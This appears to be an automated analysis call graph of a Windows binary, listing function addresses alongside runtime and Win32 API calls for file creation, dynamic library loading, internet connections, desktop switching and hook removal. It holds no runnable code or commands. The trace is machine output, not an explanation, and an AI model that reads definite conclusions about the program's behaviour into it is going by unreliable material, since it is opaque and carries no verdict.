calls 76400->76426 76403->76386 76403->76392 76404->76389 76405->76395 76406->76392 76407->76395 76427 11167f0c GetLastError 76408->76427 76410 11167f8d 76411 1115fb81 76410->76411 76441 11169f7a 62 API calls 3 library calls 76410->76441 76411->76400 76413 1116cc78 76411->76413 76414 1116cc84 __write 76413->76414 76415 11167f85 __getptd 62 API calls 76414->76415 76416 1116cc89 76415->76416 76417 1116ccb7 76416->76417 76418 1116cc9b 76416->76418 76443 1116cc2b 31 API calls 3 library calls 76417->76443 76419 11167f85 __getptd 62 API calls 76418->76419 76421 1116cca0 76419->76421 76424 1116ccae __write 76421->76424 76442 11169f7a 62 API calls 3 library calls 76421->76442 76422 1116ccd2 76444 1116cce5 LeaveCriticalSection _doexit 76422->76444 76424->76400 76426->76403 76428 11167dca ___set_flsgetvalue TlsGetValue DecodePointer TlsSetValue 76427->76428 76429 11167f23 76428->76429 76430 11167f79 SetLastError 76429->76430 76431 1116658e __calloc_crt 19 API calls 76429->76431 76430->76410 76432 11167f37 76431->76432 76432->76430 76433 11167f3f DecodePointer 76432->76433 76434 11167f54 76433->76434 76435 11167f70 76434->76435 76436 11167f58 76434->76436 76438 1115f3b5 _free 19 API calls 76435->76438 76437 11167e58 __initptd 11 API calls 76436->76437 76439 11167f60 GetCurrentThreadId 76437->76439 76440 11167f76 76438->76440 76439->76430 76440->76430 76443->76422 76444->76421 76446 1116779d EnterCriticalSection 76445->76446 76447 1116777b 76445->76447 76448 11167783 76446->76448 76447->76446 76447->76448 76448->76375 76450 111604ed 76449->76450 76451 111604d9 76449->76451 76457 111604e9 76450->76457 76468 11167847 76450->76468 76508 11165abf 23 API calls __getptd_noexit 76451->76508 76454 111604de 76509 1116a6d4 11 API calls _sprintf 76454->76509 76467 111605a1 LeaveCriticalSection LeaveCriticalSection __fsopen 76457->76467 76461 11160507 76485 1116d7d4 76461->76485 76463 1116050d 76463->76457 76510 1115f3b5 76463->76510 76465->76372 76466->76377 76467->76377 76469 11167860 76468->76469 76470 111604f9 76468->76470 76469->76470 76471 11165a57 __filbuf 34 API calls 76469->76471 76474 1116d898 76470->76474 76472 1116787b 76471->76472 76516 1116ea14 93 API calls 4 library calls 76472->76516 76475 11160501 76474->76475 76476 1116d8a8 76474->76476 76478 11165a57 76475->76478 76476->76475 76477 1115f3b5 _free 23 API calls 76476->76477 76477->76475 76479 11165a63 76478->76479 76480 11165a78 76478->76480 76517 11165abf 23 API calls __getptd_noexit 76479->76517 76480->76461 76482 11165a68 76518 1116a6d4 11 API calls _sprintf 76482->76518 76484 11165a73 76484->76461 76486 1116d7e0 __write 76485->76486 76487 1116d803 76486->76487 76488 1116d7e8 76486->76488 76490 1116d80f 76487->76490 76494 1116d849 76487->76494 76542 11165ad2 23 API calls __getptd_noexit 76488->76542 76544 11165ad2 23 API calls __getptd_noexit 76490->76544 76491 1116d7ed 76543 11165abf 23 API calls __getptd_noexit 76491->76543 76493 1116d814 76545 11165abf 23 API calls __getptd_noexit 76493->76545 76519 111731d2 76494->76519 76498 1116d81c 76546 1116a6d4 11 API calls _sprintf 76498->76546 76499 1116d84f 76501 1116d85d 76499->76501 76502 1116d869 76499->76502 76527 1116d738 76501->76527 76547 11165abf 23 API calls __getptd_noexit 76502->76547 76505 1116d7f5 __write 76505->76463 76508->76454 76509->76457 76511 1115f3c0 HeapFree 76510->76511 76512 1115f3e9 __dosmaperr 76510->76512 76511->76512 76513 1115f3d5 76511->76513 76512->76457 76516->76470 76517->76482 76518->76484 76521 111731de __write 76519->76521 76520 11173238 76522 1117323d EnterCriticalSection 76520->76522 76523 1117325a __write 76520->76523 76521->76520 76524 11173213 InitializeCriticalSectionAndSpinCount 76521->76524 76525 11173226 76521->76525 76522->76523 76523->76499 76524->76525 76549 11173268 LeaveCriticalSection _doexit 76525->76549 76542->76491 76543->76505 76544->76493 76545->76498 76546->76505 76549->76520 76572 11140d1c 76571->76572 76573 11161de8 _strlen 76571->76573 76572->76320 76573->76572 76577 1116866f 76573->76577 76578 11168684 76577->76578 76579 1116867d 76577->76579 76589 11165abf 23 API calls __getptd_noexit 76578->76589 76579->76578 76583 111686a2 76579->76583 76581 11168689 76590 1116a6d4 11 API calls _sprintf 76581->76590 76584 11161e0d 76583->76584 76591 11165abf 23 API calls __getptd_noexit 76583->76591 76584->76572 76586 1116a682 76584->76586 76592 1116a559 76586->76592 76589->76581 76590->76584 76591->76581 76593 1116a578 _memset __call_reportfault 76592->76593 76594 1116a596 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 76593->76594 76595 1116a664 __call_reportfault 76594->76595 76596 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 76595->76596 76597 1116a680 GetCurrentProcess TerminateProcess 76596->76597 76597->76572 76598->76299 76602 111606bb __write 76599->76602 76600 111606ce 76652 11165abf 23 API calls __getptd_noexit 76600->76652 76602->76600 76604 111606fb 76602->76604 76603 111606d3 76653 1116a6d4 11 API calls _sprintf 76603->76653 76618 1116dec8 76604->76618 76607 11160700 76608 11160707 76607->76608 76609 11160714 76607->76609 76654 11165abf 23 API calls __getptd_noexit 76608->76654 76610 1116073b 76609->76610 76611 1116071b 76609->76611 76630 1116dc31 76610->76630 76655 11165abf 23 API calls __getptd_noexit 76611->76655 76613 111606de __write @_EH4_CallFilterFunc@8 76613->76254 76628 1116ded4 __write 76618->76628 76619 1116df57 76657 1116dff2 76619->76657 76620 1116df5e 76620->76619 76623 1116df73 InitializeCriticalSectionAndSpinCount 76620->76623 76622 1116dfe7 __write 76622->76607 76624 1116dfa6 EnterCriticalSection 76623->76624 76625 1116df93 76623->76625 76624->76619 76627 1115f3b5 _free 23 API calls 76625->76627 76627->76619 76628->76619 76628->76620 76660 111677aa EnterCriticalSection 76628->76660 76661 11167818 LeaveCriticalSection LeaveCriticalSection _doexit 76628->76661 76632 1116dc53 76630->76632 76631 1116dc7e 76637 1116de6f 76631->76637 76651 1116de1b 76631->76651 76668 1117625d 72 API calls __fassign 76631->76668 76632->76631 76633 1116dc67 76632->76633 76666 11165abf 23 API calls __getptd_noexit 76633->76666 76635 1116dc6c 76667 1116a6d4 11 API calls _sprintf 76635->76667 76636 1116de81 76663 11175ed3 76636->76663 76672 11165abf 23 API calls __getptd_noexit 76637->76672 76641 11160746 76656 11160761 LeaveCriticalSection LeaveCriticalSection __fsopen 76641->76656 76642 1116de74 76673 1116a6d4 11 API calls _sprintf 76642->76673 76645 1116ddea 76645->76637 76669 111760f7 81 API calls __mbsnbicmp_l 76645->76669 76647 1116de14 76647->76651 76670 111760f7 81 API calls __mbsnbicmp_l 76647->76670 76649 1116de33 76649->76651 76671 111760f7 81 API calls __mbsnbicmp_l 76649->76671 76651->76636 76651->76637 76652->76603 76653->76613 76654->76613 76655->76613 76656->76613 76662 1116fe36 LeaveCriticalSection 76657->76662 76659 1116dff9 76659->76622 76660->76628 76661->76628 76662->76659 76674 11175e0f 76663->76674 76665 11175eee 76665->76641 76666->76635 76667->76641 76668->76645 76669->76647 76670->76649 76671->76651 76672->76642 76673->76641 76676 11175e1b __write 76674->76676 76675 11175e2e 76794 11165abf 23 API calls __getptd_noexit 76675->76794 76676->76675 76678 11175e64 76676->76678 76685 111756db 76678->76685 76679 11175e33 76795 1116a6d4 11 API calls _sprintf 76679->76795 76682 11175e7e 76796 11175ea5 LeaveCriticalSection __unlock_fhandle 76682->76796 76684 11175e3d __write 76684->76665 76686 11175702 76685->76686 76797 11178c85 76686->76797 76688 1117571e 76690 1117575d 76688->76690 76700 111757b8 76688->76700 76740 1117598d 76688->76740 76689 1116a682 __invoke_watson 10 API calls 76694 11175e0e __write 76689->76694 76817 11165ad2 23 API calls __getptd_noexit 76690->76817 76692 11175e2e 76912 11165abf 23 API calls __getptd_noexit 76692->76912 76693 11175762 76818 11165abf 23 API calls __getptd_noexit 76693->76818 76694->76692 76697 11175e64 76694->76697 76701 111756db __tsopen_nolock 116 API calls 76697->76701 76698 11175e33 76913 1116a6d4 11 API calls _sprintf 76698->76913 76699 1117576c 76819 1116a6d4 11 API calls _sprintf 76699->76819 76703 1117583f 76700->76703 76708 11175812 76700->76708 76705 11175e7e 76701->76705 76820 11165ad2 23 API calls __getptd_noexit 76703->76820 76914 11175ea5 LeaveCriticalSection __unlock_fhandle 76705->76914 76804 11173298 76708->76804 76709 11175844 76821 11165abf 23 API calls __getptd_noexit 76709->76821 76711 11175e3d __write 76711->76682 76712 1117584e 76822 1116a6d4 11 API calls _sprintf 76712->76822 76715 11175776 76715->76682 76716 111758d0 76717 111758fa CreateFileA 76716->76717 76718 111758d9 76716->76718 76719 11175997 GetFileType 76717->76719 76720 11175927 76717->76720 76823 11165ad2 23 API calls __getptd_noexit 76718->76823 76722 111759a4 GetLastError 76719->76722 76723 111759e8 76719->76723 76725 11175960 GetLastError 76720->76725 76728 1117593b CreateFileA 76720->76728 76828 11165ae5 23 API calls 3 library calls 76722->76828 76830 11173062 24 API calls 2 library calls 76723->76830 76724 111758de 76824 11165abf 23 API calls __getptd_noexit 76724->76824 76826 11165ae5 23 API calls 3 library calls 76725->76826 76728->76719 76728->76725 76730 111759cd CloseHandle 76732 11175987 76730->76732 76733 111759db 76730->76733 76731 111758e8 76825 11165abf 23 API calls __getptd_noexit 76731->76825 76827 11165abf 23 API calls __getptd_noexit 76732->76827 76829 11165abf 23 API calls __getptd_noexit 76733->76829 76737 11175a06 76741 11175c1c 76737->76741 76742 11175a5c 76737->76742 76746 11175acb 76737->76746 76739 111759e0 76739->76732 76740->76689 76741->76740 76744 11175d84 CloseHandle CreateFileA 76741->76744 76831 111710b6 36 API calls 3 library calls 76742->76831 76747 11175ddf 76744->76747 76748 11175db1 GetLastError 76744->76748 76745 11175a66 76749 11175a6f 76745->76749 76750 11175a88 76745->76750 76746->76741 76756 11175c25 76746->76756 76765 11175b75 76746->76765 76747->76740 76910 11165ae5 23 API calls 3 library calls 76748->76910 76832 11165ad2 23 API calls __getptd_noexit 76749->76832 76833 11170a09 76750->76833 76754 11175dbd 76911 111730e3 24 API calls 2 library calls 76754->76911 76755 11175a74 76755->76746 76759 11175a7c 76755->76759 76756->76741 76767 11175c42 76756->76767 76770 11175b99 76756->76770 76764 1116d738 __close_nolock 37 API calls 76759->76764 76760 11175bed 76763 11170a09 __read_nolock 44 API calls 76760->76763 76776 11175bfa 76763->76776 76764->76732 76765->76741 76765->76760 76765->76770 76771 11175bc4 76765->76771 76904 11171df9 36 API calls 3 library calls 76767->76904 76769 11175c4d 76769->76770 76772 11175c58 76769->76772 76770->76741 76770->76759 76909 1116ea14 93 API calls 4 library calls 76770->76909 76902 11171df9 36 API calls 3 library calls 76771->76902 76905 11171df9 36 API calls 3 library calls 76772->76905 76774 11175c83 76782 1116d738 __close_nolock 37 API calls 76774->76782 76775 11175c9d 76777 11175cbf 76775->76777 76783 11175ca4 76775->76783 76776->76741 76776->76759 76776->76774 76776->76775 76776->76777 76908 111710b6 36 API calls 3 library calls 76777->76908 76779 11175bcf 76779->76770 76784 11175bd6 76779->76784 76786 11175c8a 76782->76786 76907 111710b6 36 API calls 3 library calls 76783->76907 76903 11171df9 36 API calls 3 library calls 76784->76903 76785 11175c62 76785->76741 76785->76759 76793 11175be0 76793->76759 76793->76760 76794->76679 76795->76684 76796->76684 76798 11178ca6 76797->76798 76799 11178c91 76797->76799 76798->76688 76915 11165abf 23 API calls __getptd_noexit 76799->76915 76801 11178c96 76916 1116a6d4 11 API calls _sprintf 76801->76916 76803 11178ca1 76803->76688 76813 111732a4 __write 76804->76813 76805 111732b9 __write 76805->76716 76807 111733a0 76918 1116658e 76807->76918 76809 11173348 EnterCriticalSection 76810 11173358 LeaveCriticalSection 76809->76810 76809->76813 76810->76813 76812 1117331e InitializeCriticalSectionAndSpinCount 76812->76813 76813->76805 76813->76807 76813->76809 76813->76812 76816 1117340a 76813->76816 76917 1117336a LeaveCriticalSection _doexit 76813->76917 76814 111731d2 ___lock_fhandle 3 API calls 76814->76816 76924 11173428 LeaveCriticalSection _doexit 76816->76924 76817->76693 76818->76699 76819->76715 76820->76709 76821->76712 76822->76715 76823->76724 76824->76731 76825->76715 76826->76732 76827->76740 76828->76730 76829->76739 76830->76737 76831->76745 76832->76755 76834 11170a25 76833->76834 76835 11170a40 76833->76835 76936 11165ad2 23 API calls __getptd_noexit 76834->76936 76837 11170a4f 76835->76837 76840 11170a6e 76835->76840 76938 11165ad2 23 API calls __getptd_noexit 76837->76938 76838 11170a2a 76841 11170a8c 76840->76841 76855 11170aa0 76840->76855 76902->76779 76903->76793 76904->76769 76905->76785 76908->76785 76909->76770 76910->76754 76911->76747 76912->76698 76913->76711 76914->76711 76915->76801 76916->76803 76917->76813 76921 11166597 76918->76921 76920 111665d4 76920->76814 76920->76816 76921->76920 76922 111665b5 Sleep 76921->76922 76925 1116c936 76921->76925 76923 111665ca 76922->76923 76923->76920 76923->76921 76924->76805 76926 1116c942 76925->76926 76930 1116c95d 76925->76930 76927 1116c94e 76926->76927 76926->76930 76934 11165abf 23 API calls __getptd_noexit 76927->76934 76929 1116c970 RtlAllocateHeap 76929->76930 76933 1116c997 76929->76933 76930->76929 76930->76933 76935 11169c78 DecodePointer 76930->76935 76931 1116c953 76931->76921 76933->76921 76934->76931 76935->76930 76936->76838 76956 11030444 GetModuleHandleA GetProcAddress 76957 11030461 GetNativeSystemInfo 76956->76957 76960 1103046d 76956->76960 76957->76960 76958 1103040d 76972 11030430 GetStockObject GetObjectA 76958->76972 77024 1110c420 76958->77024 76960->76958 76963 110304d1 76960->76963 76966 1110c420 std::_Mutex::_Mutex 261 API calls 76963->76966 76965 11030696 SetErrorMode SetErrorMode 76969 1110c420 std::_Mutex::_Mutex 261 API calls 76965->76969 76968 110304d8 76966->76968 77166 110f8130 268 API calls std::_Mutex::_Mutex 76968->77166 76970 110306d2 76969->76970 77075 11027fe0 76970->77075 76972->76965 76974 110306ec 76975 1110c420 std::_Mutex::_Mutex 261 API calls 76974->76975 76976 11030712 76975->76976 76977 11027fe0 264 API calls 76976->76977 76978 1103072b InterlockedExchange 76977->76978 76980 1110c420 std::_Mutex::_Mutex 261 API calls 76978->76980 76981 11030753 76980->76981 77078 11089840 76981->77078 76983 1103076b GetACP 77089 1115f8a3 76983->77089 76988 1103079c 77130 1113f220 76988->77130 76991 1110c420 std::_Mutex::_Mutex 261 API calls 76992 110307e8 76991->76992 77136 11060520 76992->77136 77025 1110c43e 77024->77025 77026 1110c473 _memset 77025->77026 77027 1110c447 wsprintfA 77025->77027 77030 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 77026->77030 77182 110290f0 261 API calls 2 library calls 77027->77182 77031 11030414 77030->77031 77032 11105d40 77031->77032 77033 1110c420 std::_Mutex::_Mutex 261 API calls 77032->77033 77034 11105da1 77033->77034 77035 11105db9 OpenEventA 77034->77035 77183 111042a0 77034->77183 77038 11105ee1 GetStockObject GetObjectA InitializeCriticalSection InitializeCriticalSection 77035->77038 77039 11105e28 CloseHandle GetSystemDirectoryA 77035->77039 77040 1110c420 std::_Mutex::_Mutex 261 API calls 77038->77040 77041 11105e48 77039->77041 77042 11105f33 77040->77042 77041->77041 77043 11105e50 LoadLibraryA 77041->77043 77044 11105f4c 77042->77044 77251 110f23a0 264 API calls std::_Mutex::_Mutex 77042->77251 77043->77038 77045 11105e81 77043->77045 77202 1110c2b0 77044->77202 77218 11141710 77045->77218 77049 11105e8b 77050 11105e92 GetProcAddress 77049->77050 77051 11105eaa GetProcAddress 77049->77051 77050->77051 77053 11105ed4 FreeLibrary 77051->77053 77054 11105ec6 77051->77054 77053->77038 77054->77038 77057 11106015 77059 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 77057->77059 77058 1110c420 std::_Mutex::_Mutex 261 API calls 77060 11105f83 77058->77060 77061 1110602f 77059->77061 77062 11105f94 77060->77062 77063 11105f9d 77060->77063 77061->76972 77252 110f23a0 264 API calls std::_Mutex::_Mutex 77062->77252 77065 1110c2b0 420 API calls 77063->77065 77066 11105fb9 CloseHandle 77065->77066 77067 11141710 std::_Mutex::_Mutex 86 API calls 77066->77067 77068 11105fca 77067->77068 77068->77057 77069 1110c420 std::_Mutex::_Mutex 261 API calls 77068->77069 77070 11105fd8 77069->77070 77071 11105ff2 77070->77071 77253 110f23a0 264 API calls std::_Mutex::_Mutex 77070->77253 77073 1110c2b0 420 API calls 77071->77073 77074 1110600e CloseHandle 77073->77074 77074->77057 77076 110879a0 264 API calls 77075->77076 77077 11027feb _memset 77076->77077 77077->76974 77079 1110c420 std::_Mutex::_Mutex 261 API calls 77078->77079 77080 11089877 77079->77080 77081 11089899 InitializeCriticalSection 77080->77081 77082 1110c420 std::_Mutex::_Mutex 261 API calls 77080->77082 77084 110898fa 77081->77084 77085 11089892 77082->77085 77084->76983 77085->77081 77660 1115e96a 34 API calls std::exception::_Copy_str 77085->77660 77087 110898c9 77661 1115edc1 RaiseException 77087->77661 77090 1115f8d6 77089->77090 77091 1115f8c1 77089->77091 77090->77091 77095 1115f8dd 77090->77095 77681 11165abf 23 API calls __getptd_noexit 77091->77681 77093 1115f8c6 77682 1116a6d4 11 API calls _sprintf 77093->77682 77096 11030792 77095->77096 77662 1116b9f4 77095->77662 77098 11161c63 77096->77098 77099 11161c6f __write 77098->77099 77100 11161c90 77099->77100 77101 11161c79 77099->77101 77103 11167f85 __getptd 62 API calls 77100->77103 77714 11165abf 23 API calls __getptd_noexit 77101->77714 77105 11161c95 77103->77105 77104 11161c7e 77715 1116a6d4 11 API calls _sprintf 77104->77715 77107 1116cc78 _setlocale 70 API calls 77105->77107 77108 11161c9f 77107->77108 77109 1116658e __calloc_crt 23 API calls 77108->77109 77111 11161cb5 77109->77111 77110 11161c89 __write _setlocale 77110->76988 77111->77110 77689 111610d4 77111->77689 77118 11161dac 77720 1116ca47 8 API calls 77118->77720 77122 11161cfb _setlocale 77716 1116cc2b 31 API calls 3 library calls 77122->77716 77124 11161d33 77850 1113f130 77130->77850 77132 1113f130 IsDBCSLeadByte 77133 1113f235 77132->77133 77133->77132 77134 11161f66 81 API calls std::_Mutex::_Mutex 77133->77134 77135 110307c8 77133->77135 77134->77133 77135->76991 77137 1106055e 77136->77137 77138 1110c420 std::_Mutex::_Mutex 261 API calls 77137->77138 77139 1106058b 77138->77139 77140 1110c420 std::_Mutex::_Mutex 261 API calls 77139->77140 77142 110605b5 77140->77142 77166->76972 77254 1110c520 77183->77254 77186 1110c520 3 API calls 77187 111042ec 77186->77187 77188 1110c520 3 API calls 77187->77188 77189 111042fe 77188->77189 77190 1110c520 3 API calls 77189->77190 77191 1110430f 77190->77191 77192 1110c520 3 API calls 77191->77192 77193 11104320 77192->77193 77194 1110c420 std::_Mutex::_Mutex 261 API calls 77193->77194 77195 11104331 77194->77195 77196 1110441a 77195->77196 77197 1110433c LoadLibraryA LoadLibraryA 77195->77197 77261 1115e96a 34 API calls std::exception::_Copy_str 77196->77261 77197->77035 77199 11104429 77262 1115edc1 RaiseException 77199->77262 77201 1110443e 77203 1110c2d0 CreateThread 77202->77203 77204 1110c2bf CreateEventA 77202->77204 77206 1110c2f6 77203->77206 77207 1110c30d 77203->77207 77266 1110cd70 77203->77266 77280 11026ee0 77203->77280 77305 1102c030 77203->77305 77340 110ffe60 77203->77340 77204->77203 77265 110290f0 261 API calls 2 library calls 77206->77265 77209 1110c311 WaitForSingleObject CloseHandle 77207->77209 77210 11105f68 CloseHandle 77207->77210 77209->77210 77212 1109dcf0 77210->77212 77213 1109dcff GetCurrentProcess OpenProcessToken 77212->77213 77214 1109dd3d 77212->77214 77213->77214 77215 1109dd22 77213->77215 77214->77057 77214->77058 77627 1109dc20 77215->77627 77217 1109dd2b CloseHandle 77217->77214 77219 11141731 GetVersionExA 77218->77219 77228 1114190c 77218->77228 77221 11141753 77219->77221 77219->77228 77220 11141915 77222 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 77220->77222 77223 11141760 RegOpenKeyExA 77221->77223 77221->77228 77225 11141922 77222->77225 77224 1114178d _memset 77223->77224 77223->77228 77640 1113f670 RegQueryValueExA 77224->77640 77225->77049 77226 11141974 77227 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 77226->77227 77229 11141984 77227->77229 77228->77220 77228->77226 77647 11080d00 77228->77647 77229->77049 77233 1113f670 std::_Mutex::_Mutex RegQueryValueExA 77235 111417f9 77233->77235 77234 1114195c 77234->77220 77237 1115f5b7 std::_Mutex::_Mutex 75 API calls 77234->77237 77236 111418ff RegCloseKey 77235->77236 77238 1115f5b7 std::_Mutex::_Mutex 75 API calls 77235->77238 77236->77228 77239 1114196d 77237->77239 77240 1114180e 77238->77240 77239->77220 77239->77226 77642 111601fd 77240->77642 77242 1114181d 77243 11141836 77242->77243 77244 111601fd std::_Mutex::_Mutex 75 API calls 77242->77244 77245 1115f5b7 std::_Mutex::_Mutex 75 API calls 77243->77245 77244->77242 77247 11141842 _strncpy 77245->77247 77246 111418e1 77246->77236 77247->77246 77248 1113f670 std::_Mutex::_Mutex RegQueryValueExA 77247->77248 77249 111418b8 77248->77249 77250 1113f670 std::_Mutex::_Mutex RegQueryValueExA 77249->77250 77250->77246 77251->77044 77252->77063 77253->77071 77255 1110c536 CreateEventA 77254->77255 77256 1110c549 77254->77256 77255->77256 77258 1110c557 77256->77258 77263 1110c260 InterlockedIncrement 77256->77263 77259 111042dc 77258->77259 77264 1110c3c0 InterlockedIncrement 77258->77264 77259->77186 77261->77199 77262->77201 77263->77258 77264->77259 77362 110b6cd0 77266->77362 77268 1110cd7e GetCurrentThreadId 77364 1110c340 77268->77364 77270 1110ce10 77371 1110c370 SetEvent PulseEvent 77270->77371 77272 1110cdb0 WaitForSingleObject 77369 1110cba0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Ios_base_dtor 77272->77369 77273 1110ce1a 77275 1110cdd3 77276 1110cde3 PostMessageA 77275->77276 77277 1110cde8 PostThreadMessageA 77275->77277 77278 1110cd99 std::ios_base::_Ios_base_dtor 77276->77278 77277->77278 77278->77270 77278->77272 77278->77275 77370 1110cba0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Ios_base_dtor 77278->77370 77281 11026f12 77280->77281 77373 110883c0 77281->77373 77284 1110c420 std::_Mutex::_Mutex 261 API calls 77285 11026f36 77284->77285 77286 11026f57 77285->77286 77378 1110d060 77285->77378 77288 1110c340 262 API calls 77286->77288 77300 11026f6f 77288->77300 77289 11026f86 WaitForMultipleObjects 77290 11026f9d 77289->77290 77289->77300 77291 11026fa6 PostMessageA 77290->77291 77292 11026fba SetEvent Sleep 77290->77292 77291->77292 77291->77300 77292->77300 77293 11027064 77294 1102707e CloseHandle 77293->77294 77407 1110cc00 274 API calls 2 library calls 77293->77407 77408 1110c370 SetEvent PulseEvent 77294->77408 77295 11026fe5 PostMessageA 77295->77300 77299 11027075 std::ios_base::_Ios_base_dtor 77299->77294 77300->77289 77300->77293 77300->77295 77302 1102702a GetCurrentThreadId GetThreadDesktop 77300->77302 77406 11026ec0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 77300->77406 77301 11027093 77302->77300 77303 11027039 SetThreadDesktop 77302->77303 77303->77300 77304 11027044 CloseDesktop 77303->77304 77304->77300 77306 1102c062 77305->77306 77307 1110c340 262 API calls 77306->77307 77308 1102c06f WaitForSingleObject 77307->77308 77309 1102c086 77308->77309 77310 1102c29d 77308->77310 77311 1102c090 GetTickCount 77309->77311 77312 1102c286 WaitForSingleObject 77309->77312 77496 1110c370 SetEvent PulseEvent 77310->77496 77412 110cf410 77311->77412 77312->77309 77312->77310 77315 1102c2a4 CloseHandle 77497 1110c580 InterlockedDecrement SetEvent PulseEvent InterlockedDecrement CloseHandle 77315->77497 77317 110cf410 264 API calls 77330 1102c0a6 77317->77330 77318 1102c2b5 std::ios_base::_Ios_base_dtor 77320 1102c2d4 77498 110290f0 261 API calls 2 library calls 77320->77498 77322 1102c2e8 77499 110290f0 261 API calls 2 library calls 77322->77499 77324 1102c2fc 77500 110290f0 261 API calls 2 library calls 77324->77500 77327 1102c310 77501 110290f0 261 API calls 2 library calls 77327->77501 77329 1102c194 GetTickCount 77339 1102c191 std::ios_base::_Ios_base_dtor 77329->77339 77330->77317 77330->77320 77330->77322 77330->77324 77330->77329 77422 110ce440 77330->77422 77434 11029230 LoadLibraryA 77330->77434 77485 110cf0a0 265 API calls 2 library calls 77330->77485 77332 11142a60 std::_Mutex::_Mutex 21 API calls 77332->77339 77334 110ce4f0 261 API calls 77334->77339 77335 1113e8f0 std::_Mutex::_Mutex 261 API calls 77335->77339 77337 11066f60 294 API calls 77337->77339 77339->77320 77339->77322 77339->77327 77339->77329 77339->77332 77339->77334 77339->77335 77339->77337 77486 11041cc0 263 API calls 2 library calls 77339->77486 77487 110ce4f0 77339->77487 77341 110883c0 5 API calls 77340->77341 77342 110ffe6d 77341->77342 77343 110ffe79 GetCurrentThreadId GetThreadDesktop OpenDesktopA 77342->77343 77344 110ffedf GetLastError 77343->77344 77345 110ffe9f SetThreadDesktop 77343->77345 77348 11142a60 std::_Mutex::_Mutex 21 API calls 77344->77348 77346 110ffeaa 77345->77346 77347 110ffec1 GetLastError 77345->77347 77349 11142a60 std::_Mutex::_Mutex 21 API calls 77346->77349 77350 11142a60 std::_Mutex::_Mutex 21 API calls 77347->77350 77351 110ffef1 77348->77351 77352 110ffeb5 CloseDesktop 77349->77352 77353 110ffed3 CloseDesktop 77350->77353 77599 110ffde0 77351->77599 77352->77351 77353->77351 77355 110ffefb 77356 1110c340 262 API calls 77355->77356 77357 110fff02 77356->77357 77605 110f2460 16 API calls 77357->77605 77359 110fff09 77606 1110c370 SetEvent PulseEvent 77359->77606 77361 110fff10 std::ios_base::_Ios_base_dtor 77363 110b6cd8 std::_Mutex::_Mutex 77362->77363 77363->77268 77365 1110c360 SetEvent 77364->77365 77366 1110c349 77364->77366 77365->77278 77372 110290f0 261 API calls 2 library calls 77366->77372 77369->77278 77370->77278 77371->77273 77374 1110c650 4 API calls 77373->77374 77375 110883d0 77374->77375 77376 11026f19 CreateEventA 77375->77376 77377 110883e2 UnhookWindowsHookEx 77375->77377 77376->77284 77377->77376 77379 1110c420 std::_Mutex::_Mutex 261 API calls 77378->77379 77380 1110d091 77379->77380 77382 1110c420 std::_Mutex::_Mutex 261 API calls 77380->77382 77388 1110d0b3 GetCurrentThreadId InitializeCriticalSection 77380->77388 77385 1110d0ac 77382->77385 77383 1110d120 EnterCriticalSection 77386 1110d1da LeaveCriticalSection 77383->77386 77387 1110d14e CreateEventA 77383->77387 77384 1110d113 InitializeCriticalSection 77384->77383 77385->77388 77409 1115e96a 34 API calls std::exception::_Copy_str 77385->77409 77386->77286 77390 1110d161 77387->77390 77391 1110d178 77387->77391 77388->77383 77388->77384 77411 110290f0 261 API calls 2 library calls 77390->77411 77394 1110c420 std::_Mutex::_Mutex 261 API calls 77391->77394 77392 1110d0cf 77410 1115edc1 RaiseException 77392->77410 77397 1110d17f 77394->77397 77398 1110d19c 77397->77398 77399 1110d060 414 API calls 77397->77399 77400 1110c420 std::_Mutex::_Mutex 261 API calls 77398->77400 77399->77398 77401 1110d1ac 77400->77401 77402 1110d1bd 77401->77402 77403 1110c520 3 API calls 77401->77403 77404 1110c2b0 414 API calls 77402->77404 77403->77402 77405 1110d1d5 77404->77405 77405->77386 77406->77300 77407->77299 77408->77301 77409->77392 77410->77388 77502 110cf1b0 77412->77502 77415 110cf45b 77418 110cf475 77415->77418 77419 110cf458 77415->77419 77416 110cf444 77516 110290f0 261 API calls 2 library calls 77416->77516 77418->77330 77419->77415 77517 110290f0 261 API calls 2 library calls 77419->77517 77423 110ce454 77422->77423 77424 11161dd7 __strdup 34 API calls 77423->77424 77425 110ce45f 77424->77425 77426 110ce180 261 API calls 77425->77426 77427 110ce483 77426->77427 77575 110cdb90 77427->77575 77458 110292c1 std::ios_base::_Ios_base_dtor 77434->77458 77435 110292f3 GetProcAddress 77436 11029311 SetLastError 77435->77436 77435->77458 77436->77458 77437 110293e8 InternetOpenA 77437->77458 77438 110293cf GetProcAddress 77438->77437 77439 11029419 SetLastError 77438->77439 77439->77458 77440 11029345 GetProcAddress 77441 11029402 SetLastError 77440->77441 77440->77458 77442 11029372 GetLastError 77441->77442 77442->77458 77443 1113e8f0 std::_Mutex::_Mutex 261 API calls 77443->77458 77444 1115f3b5 23 API calls _free 77444->77458 77445 11029395 GetProcAddress 77446 1102940f SetLastError 77445->77446 77445->77458 77446->77458 77447 110296e0 77452 11029816 GetProcAddress 77447->77452 77453 110296d1 77447->77453 77448 11029850 77448->77339 77449 11029849 FreeLibrary 77449->77448 77450 110296ba std::ios_base::_Ios_base_dtor 77450->77447 77451 110296f7 GetProcAddress 77450->77451 77450->77453 77457 110297d6 std::ios_base::_Ios_base_dtor 77450->77457 77459 11029728 std::ios_base::_Ios_base_dtor 77450->77459 77451->77450 77455 110297ce SetLastError 77451->77455 77452->77453 77456 11029837 SetLastError 77452->77456 77453->77448 77453->77449 77454 11080b10 IsDBCSLeadByte 77454->77458 77455->77457 77456->77453 77592 11027510 GetProcAddress SetLastError 77457->77592 77458->77435 77458->77437 77458->77438 77458->77440 77458->77442 77458->77443 77458->77444 77458->77445 77458->77450 77458->77454 77464 1102949f GetProcAddress 77458->77464 77465 110294cb GetProcAddress 77458->77465 77466 110294de InternetConnectA 77458->77466 77471 11029543 GetProcAddress 77458->77471 77472 11029504 GetProcAddress 77458->77472 77476 11029591 GetProcAddress 77458->77476 77478 110295c2 GetLastError 77458->77478 77481 11029615 GetLastError 77458->77481 77482 1102962c GetDesktopWindow 77458->77482 77459->77450 77459->77457 77462 1110c4a0 std::_Mutex::_Mutex 261 API calls 77459->77462 